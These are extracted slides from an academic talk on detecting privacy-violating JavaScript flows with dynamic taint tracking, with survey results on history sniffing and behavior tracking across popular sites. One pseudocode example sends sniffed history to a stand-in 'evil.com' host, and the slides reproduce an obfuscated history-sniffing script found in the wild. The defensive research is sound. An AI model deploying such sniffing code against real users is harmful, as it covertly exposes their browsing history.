An Empirical Study ofPrivacy-Violating Information Flows
In JavaScript Web Applications
Dongseok Jang Ranjit Jhala Sorin Lerner Hovav Shacham
UC San Diego
document.location
✗ Location HijackingPhishing
document.cookie
Identity Theft✗ Cookie Stealing
✗ History Sniffing
JavaScriptVisited
Not-Visited
See absolutely everything visitors do on your webpage. …
Behavior Tracking✗
Plenty of Mischief Possible!
How Prevalent Are Malicious Flows?
How to Detect Malicious Flows?
MotivationFlow Policies
Dynamic Flow TrackingFlows in the Wild
Conclusions
Flow Policies
Specify different types of flows
Policies:History Sniffing
1. Create (invisible) link to a.com color depends on history
2. Inspect link’s color style property color says if link was visited
3. Send sniffed info over network
Policies:History Sniffing link = createLink(“facebook.com”); style = doc.getStyle(link);
visited = style.color==“purple”;
send(“evil.com”,“facebook=” + visited);
Policies:History Sniffing
Inject Taints(At confidential sources)
link = createLink(“facebook.com”); style = doc.getStyle(link);
visited = style.color==“purple”;
send(“evil.com”,“facebook=” + visited);
doc.getStyle(link);
Policies:History Sniffing
Propagate Taints(At assignments, etc.)
link = createLink(“facebook.com”); style = doc.getStyle(link);
visited = style.color==“purple”;
send(“evil.com”,“facebook=” + visited);
doc.getStyle(link);
send(“evil.com”,“facebook=” + visited);
style
visited style.color==“purple”style.color==“purple”;
link = createLink(“facebook.com”); style = doc.getStyle(link);
visited = style.color==“purple”;
send(“evil.com”,“facebook=” + visited); “cr=” +
color
Policies:History Sniffing
Block Taints(At untrusted sinks)
send(“evil.com”,“facebook=” + visited);
Flow Policies
Inject Block
Flow Policies
at doc.getStyle($1) if isLink($1)inject “secret”
Taint style with “secret”
Inject Block
Flow Policies
Inject Block
Flow Policies
at send($1, $2)block “secret” on $2
Block tainted values to third-party
Inject Block
Flow Policies
Inject Blockat Site if Cond inject Taint
at Site block Taint on Param
Flow Policies
ExpressiveHistory Sniffing
Behavior TrackingCookie Stealing
Location Hijacking…
MotivationFlow Policies
Dynamic Flow TrackingFlows in the Wild
Conclusions
Dynamic Flow TrackingRewrite JS code to carry taints
Parse ExecuteSourcecode AST Rewrite AST
Dynamic Eval
[Chander et al POPL 07]
Add .taint fields
Parse ExecuteSourcecode AST Rewrite AST
Dynamic Eval
Inject, Propagate, Block Taints
Rewritten Code
Rewriting Issues
Parse ExecuteSourcecode AST Rewrite AST
Boxing / UnboxingIndirect Flows
Dynamic Eval
Rewriting Issues
Parse ExecuteSourcecode AST Rewrite AST
Boxing / UnboxingIndirect Flows
Dynamic Eval
Dynamic Flow TrackingRewrite JS code to carry taints
Parse ExecuteSourcecode AST Rewrite AST
Dynamic Eval
Implemented in Chrome/V8
Dynamic Flow TrackingPerformance (Overhead)
Performance: Policies
Cookie Confidentialitycookie doesn’t flow to 3rd party
codeLocation Integrity
location unaffected by 3rd party code
Performance: Benchmark
10 sites with the largest JS code base in Alexa top 100
15 – 31 Kloc (avg. 21Kloc)
Performance: Figures
Timing OverheadsPage load (avg: 2x) JS execution (avg: 3x)
Performance: Upshot
High for online useAcceptable for offline survey
MotivationFlow Policies
Dynamic Flow TrackingFlows in the Wild
Conclusions
Flows “In the Wild”
History Sniffing
Behavior Tracking
History Sniffing: Figures
Alexa Top 50,000 sites
63 sites reported as sending history over network
1 site in Alexa Top 100
46 sites were real cases
var k = {0:"qpsoivc/dpn",1:"sfeuvcf/dpn", 2:"bevmugsjfoegfs/dpn“...};var g = [];for (var m in k) { var d = k[m]; var a = ""; for (f=0; f<d.length; f++) a+=String.fromCharCode(d.charCodeAt(f) - 1) var h = false; for (var j in { "http://":"", "http://www.":""}) { var l = document.createElement("a"); l.href = j + a; document.getElementById("ol").appendChild(l); var e = document.getComputedStyle(l).getPropertyValue("color") if (e == "rgb(12, 34, 56)" || e == "rgb(12,34,56)") { h = true } } if (h) { g.push(m) }}
Encrypted URLs
Decrypt URLCreate Link
Inspect Color
History Sniffing: Example
1 site in Alexa Top 100
History Sniffing: Real CasesRank Site Desc Src Inspected URLs61 youporn adult youporn pornhub,tube8,+ 21867 charter.net news interclick cars,edmunds,+462333 feedjit traffic feedjit twitter,facebook,+62415 gamestorrents game meaningtool amazon,ebay,+2202811 newsmax news interclick cars,edmunds,+463508 namepros forum feedjit twitter,facebook,+63603 fulltono music meaningtool amazon,ebay,+2204266 youporngay adult youporngay pornhub,tube8,+ 214581 osdir tech interclick cars,edmunds,+465233 gamesfreak game interclick cars,edmunds,+46
+ 36 more cases…
History Sniffing: Real CasesRank Site Desc Src Inspected URLs61 youporn adult youporn pornhub,tube8,+ 21867 charter.net news interclick cars,edmunds,+462333 feedjit traffic feedjit twitter,facebook,+62415 gamestorrents game meaningtool amazon,ebay,+2202811 newsmax news interclick cars,edmunds,+463508 namepros forum feedjit twitter,facebook,+63603 fulltono music meaningtool amazon,ebay,+2204266 youporngay adult youporngay pornhub,tube8,+ 214581 osdir tech interclick cars,edmunds,+465233 gamesfreak game interclick cars,edmunds,+46
+ 36 more cases…
History Sniffing: Real CasesRank Site Desc Src Inspected URLs61 youporn adult youporn pornhub,tube8,+ 21867 charter.net news interclick cars,edmunds,+462333 feedjit traffic feedjit twitter,facebook,+62415 gamestorrents game meaningtool amazon,ebay,+2202811 newsmax news interclick cars,edmunds,+463508 namepros forum feedjit twitter,facebook,+63603 fulltono music meaningtool amazon,ebay,+2204266 youporngay adult youporngay pornhub,tube8,+ 214581 osdir tech interclick cars,edmunds,+465233 gamesfreak game interclick cars,edmunds,+46
+ 36 more cases…
History Sniffing: Real CasesRank Site Desc Src Inspected URLs61 youporn adult youporn pornhub,tube8,+ 21867 charter.net news interclick cars,edmunds,+462333 feedjit traffic feedjit twitter,facebook,+62415 gamestorrents game meaningtool amazon,ebay,+2202811 newsmax news interclick cars,edmunds,+463508 namepros forum feedjit twitter,facebook,+63603 fulltono music meaningtool amazon,ebay,+2204266 youporngay adult youporngay pornhub,tube8,+ 214581 osdir tech interclick cars,edmunds,+465233 gamesfreak game interclick cars,edmunds,+46
+ 36 more cases…
doubleclick.net
charter.net doubleclick.net interclick
History Sniffing: Real CasesRank Site Desc Src Inspected URLs61 youporn adult youporn pornhub,tube8,+ 21867 charter.net news interclick cars,edmunds,+462333 feedjit traffic feedjit twitter,facebook,+62415 gamestorrents game meaningtool amazon,ebay,+2202811 newsmax news interclick cars,edmunds,+463508 namepros forum feedjit twitter,facebook,+63603 fulltono music meaningtool amazon,ebay,+2204266 youporngay adult youporngay pornhub,tube8,+ 214581 osdir tech interclick cars,edmunds,+465233 gamesfreak game interclick cars,edmunds,+46
+ 36 more cases…
gamestorrents harrenmedianetwork meaningtool
History Sniffing: Upshot
# of sniffed URLs: 8 to 22246 of real cases
39 had third-party sniffing code7 had home-grown code
Obfuscated sniffing codeCode was generated at runtime
Malicious Flows “In the Wild”
History Hijacking
Behavior Tracking
Behavior Tracking
Log user behavior by JS event handlers
Send log back to website
Behavior Tracking: Policywhile(1){ e = getEvent(); if (e.isMouseOver()) onMouseOver(e); if (e.isClick()) onClick(e); ...}onMouseOver = function(event) isMouseOver = true;}
true
Behavior Tracking: Policy
at $1.isMouseOver() inject “secret”at $1.isClick() inject “secret”…
while(1){ e = getEvent(); if (e.isMouseOver()) onMouseOver(e); if (e.isClick()) onClick(e); ...}
e.isMouseOver()
Behavior Tracking: Figures
Alexa Top 1300 sites328 sites sent behavior115 sites sent behavior covertly10 sampled for manual inspection7 manually reconstructed flow
Automatically trigger JS event handlersMany user-visible (image swapping)
Covert Filter: response < 100 bytes
Behavior Tracking: Real CasesRank Site Desc Events3 youtube media click11 yahoo.co.jp portal click15 sina.com.cn portal click19 microsoft software click,mouseover34 mail.ru email click53 soso search click65 about search click
Behavior Tracking: Real CasesRank Site Desc Events3 youtube media click11 yahoo.co.jp portal click15 sina.com.cn portal click19 microsoft software click,mouseover34 mail.ru email click53 soso search click65 about search click
Behavior Tracking: Real CasesRank Site Desc Events3 youtube media click11 yahoo.co.jp portal click15 sina.com.cn portal click19 microsoft software click,mouseover34 mail.ru email click53 soso search click65 about search click
webtrends.com
MotivationFlow Policies
Dynamic Flow TrackingFlows in the Wild
Conclusions
ConclusionsFlows Occur In The WildReal cases for further study
Dynamic Approach is RequiredObfuscated & dynamically generated
Future workLarger Scale Study on Flows
Deeper crawl & other types of flow
Bullet-proof Protection ToolPolicy enforcement without
much slowdown & many false-alarms
Thank you!